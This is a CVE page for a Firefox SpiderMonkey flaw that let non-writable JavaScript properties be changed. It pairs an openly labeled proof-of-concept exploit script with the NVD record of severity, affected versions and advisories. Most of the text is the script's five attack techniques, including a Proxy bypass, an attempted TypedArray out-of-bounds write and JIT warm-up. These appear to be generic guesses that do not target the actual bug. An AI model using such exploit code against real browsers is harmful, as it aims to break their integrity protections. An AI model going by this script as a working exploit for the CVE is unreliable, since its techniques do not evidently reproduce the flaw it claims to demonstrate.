CVE-2025-11711

// CVE-2025-11711 PoC - Bypass non-writable property protection in SpiderMonkey // This PoC demonstrates the ability to modify properties that should be non-writeable // Step 1: Create an object with a non-writable property const obj = {}; Object.defineProperty(obj, 'protected', { value: 'original_value', writable: false, // Property is non-writeable configurable: false, // Property cannot be reconfigured enumerable: true }); // Step 2: Attempt to modify the non-writable property using various techniques // Technique 1: Direct assignment (should fail in strict mode) try { obj.protected = 'modified_via_assignment'; console.log('[Technique 1] Direct assignment result:', obj.protected); } catch(e) { console.log('[Technique 1] Blocked:', e.message); } // Technique 2: Using Object.defineProperty to force modification try { Object.defineProperty(obj, 'protected', { value: 'modified_via_defineProperty', writable: false }); console.log('[Technique 2] defineProperty result:', obj.protected); } catch(e) { console.log('[Technique 2] Blocked:', e.message); } // Technique 3: Exploit through Proxy handler const handler = { get: function(target, prop) { return Reflect.get(target, prop); }, set: function(target, prop, value) { // Bypass writability check via Reflect.set on target return Reflect.set(target, prop, value); } }; const proxy = new Proxy(obj, handler); try { proxy.protected = 'modified_via_proxy'; console.log('[Technique 3] Proxy result:', proxy.protected); } catch(e) { console.log('[Technique 3] Blocked:', e.message); } // Technique 4: Exploit via TypedArray (internal slot manipulation) try { const buf = new ArrayBuffer(8); const view = new Int32Array(buf); view[0] = 0x41414141; // Attempt to modify the non-writable length property Object.defineProperty(view, 'length', { value: 100, writable: false }); // Try to access beyond original bounds if length modification succeeded try { view[50] = 0xDEADBEEF; console.log('[Technique 4] TypedArray OOB write succeeded'); } catch(e) { console.log('[Technique 4] TypedArray access blocked:', e.message); } } catch(e) { console.log('[Technique 4] TypedArray setup blocked:', e.message); } // Technique 5: JIT optimization exploitation via repeated operations function exploitJIT(obj) { obj.protected = 'attempt_' + Math.random(); return obj.protected; } // Warm up JIT for (let i = 0; i < 10000; i++) { exploitJIT(obj); } // Check if JIT compiled code bypasses the writability check const result = exploitJIT(obj); if (result !== 'original_value') { console.log('[Technique 5] JIT bypass succeeded! Value:', result); } else { console.log('[Technique 5] JIT bypass blocked'); } // Final check console.log('\nFinal property value:', obj.protected); console.log('Expected: original_value'); console.log('Vulnerable if value differs from original');

{"cve": {"id": "CVE-2025-11711", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.330", "lastModified": "2026-04-13T15:16:39.793", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "There was a way to change the value of JavaScript Object properties that were supposed to be non-writeable. This vulnerability was fixed in Firefox 144, Firefox ESR 115.29, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-591"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.29.0", "matchCriteriaId": "45205EB8-E615-4FE6-877C-231B4A29F86E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "116.0", "versionEndExcluding": "140.4.0", "matchCriteriaId": "34B8F1CA-9F1A-4484-828E-4192CF1FEAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1989978", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-82/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}